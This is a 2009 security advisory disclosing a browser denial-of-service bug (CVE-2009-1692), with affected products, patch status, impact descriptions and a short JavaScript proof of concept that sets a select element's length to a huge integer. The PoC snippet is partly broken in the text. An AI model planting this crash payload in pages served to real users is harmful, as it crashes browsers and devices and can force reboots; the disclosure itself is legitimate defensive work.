G-SEC™ regularly publishes advisories about vulnerabilities that we discovered during our research. G-SEC™ tries to follow responsible disclosure guidelines whenever possible.

Advisories

One bug to rule them all - IE5,IE6,IE7,IE8,Netscape,Firefox,Safari,Opera,Konqueror,

Seamonkey,Wii,PS3,iPhone,iPod,Nokia,Siemens.... and more.



Reference : [GSEC-TZO-44-2009] - One bug to rule them all

CVE : CVE-2009-1692 (created by Apple, this bug has same root cause)

Credit: Thierry Zoller



Affected products :

Internet Explorer 5, 6, 7, 8 (all versions)



Chrome (limited)



Opera



Seamonkey



Midbrowser



Netscape 6 & 8 (9 years ago)



Konqueror (all versions)



Apple iPhone + iPod



Apple Safari



Thunderbird



Nokia Phones : Nokia N95 (Symbian OS v.9.2),Nokia N82, Nokia N810 Internet Tablet



Aigo P8860 (Browser hangs and cannot be restarted)



Siemens phones



Google Android G1 (TC4-RC30 & Firmware 1.5, Kernel: 2.6.27-00393-g6607056, Build: CRB4)

G-SEC thanks Scott Fraser for the notice



G-SEC thanks Scott Fraser for the notice Blackberry 8800 & 8130 (Browser crash due to null ptr deref)

G-SEC thanks "528-0444" & "Tyler Reguly" for the notice



G-SEC thanks "528-0444" & "Tyler Reguly" for the notice possibly more devices and products that support Javascript,



Patch status :

Mozilla : Fixed in Firefox 3.0.5 and 2.0.0.19

https://bugzilla.mozilla.org/show_bug.cgi?id=460713



https://bugzilla.mozilla.org/show_bug.cgi?id=460713 Thunderbird (probably through above mozilla engine update)

Seamonkey 1.1.17 and SeaMonkey 2 (soon to be Beta) have been patched



IE : No fix for IE5,IE6,IE7,IE8 until IE9



Konqueror : unknown (did not respond)



Apple iPhone&iPod : patched



Nokia : unknown, opened a case but never came back



Aigo P8860 : unknown



Siemens : unknown



Chrome : Patched, version unknown (only tab was affected anyways)



Webkit : fixed in r41741 - https://bugs.webkit.org/show_bug.cgi?id=23319



Opera : Patched after version 9.64



Sony PS3 - still affected

Nintendo Wii Opera - still affected, Opera sent a "notice" to Nintendo, never heard back from Opera

Others ? Find out by visiting the POC at http://crashthisthing.com/select.html



I. Background

II. Description

III. Impact

Konqueror (Ubuntu)- allocates 2GB of memory then either crashes the Browser or (most often) the OS reboots. Ubuntu's memory management system is configured as to NOT stop the process that consumes too much memory, but a random process. This sometimes leads to processes that are vital for the OS to be killed, hence the reboot. I am not kidding. Thanks to 'FX' for the memory management hint.

Chrome : allocates 2GB of memory then crashes tab with a null pointer





Firefox : allocates 2GB of memory then the Browser crashes





IE5,6,7,8 : allocates 2GB of memory then the Browser crashes





Opera : Allocated and commits as much memory as available, will not crash but other applications will become unstable





Nintento WII (Opera) : Console hangs, needs hard reset

Video: http://vimeo.com/2937101 (Thanks to David Raison)





http://vimeo.com/2937101 (Thanks to David Raison) Sony PS3 - Console hangs, needs hard reset

Video: http://vimeo.com/2937101 (Thanks to Chris Gates)





http://vimeo.com/2937101 (Thanks to Chris Gates) iPhone - iPhone hangs and needs hard reset

Video: http://vimeo.com/2873339 (Thanks to g0tcha)





http://vimeo.com/2873339 (Thanks to g0tcha) Aigo P8860 (Browser hangs and cannot be restarted)



IV. Proof of concept

Quoting Wikipedia "ECMAScript is a scripting language, standardized by Ecma International in the ECMA-262 specification and ISO/IEC 16262. The language is widely used on the web, especially in the form of its three best-known dialects, JavaScript, ActionScript, and JScript."Calling the select() method with a large integer, results in continuous allocation of x+n bytes of memory exhausting memory after a while.The impact varies from null pointer dereference (no more memory,hence crashing the browser) to the reboot of the complete Operation System (Konqueror&Ubuntu).There had never been a limit specified as to how many html elements the select call should handle, after the report of this Bug, vendors apparently agreed to a limit of 10.000 elements : "Talked to some Apple and Opera guys at the WHATWG social, and we decided this was a good number"The impact varies from browser to browser and sometimes from OS to OS function poc(o) {e = document.createElement("select");e.length=2147483647;

function go() {

poc(0);

}

</script>

URL: http://www.crashthisthing.com/select.html

Some have not understood what this code does, it does NOT loop as some vendors claimed, it just calls select.lenght() ONCE with a huge integer. One might wonder if over the 9 last years that this bug existed, nobody ever entered a large number in a select.lenght() call.

V. Disclosure timeline

Nothing particular to note.

V. Thanks

Chris Gates, FX, David Raison, Fahem Adam,a team of engineers that recognise themselves, oCert for not helping coordinate this bug.

VI. Media Coverage

Note: All trademarks mentioned herein belong to their respective owners.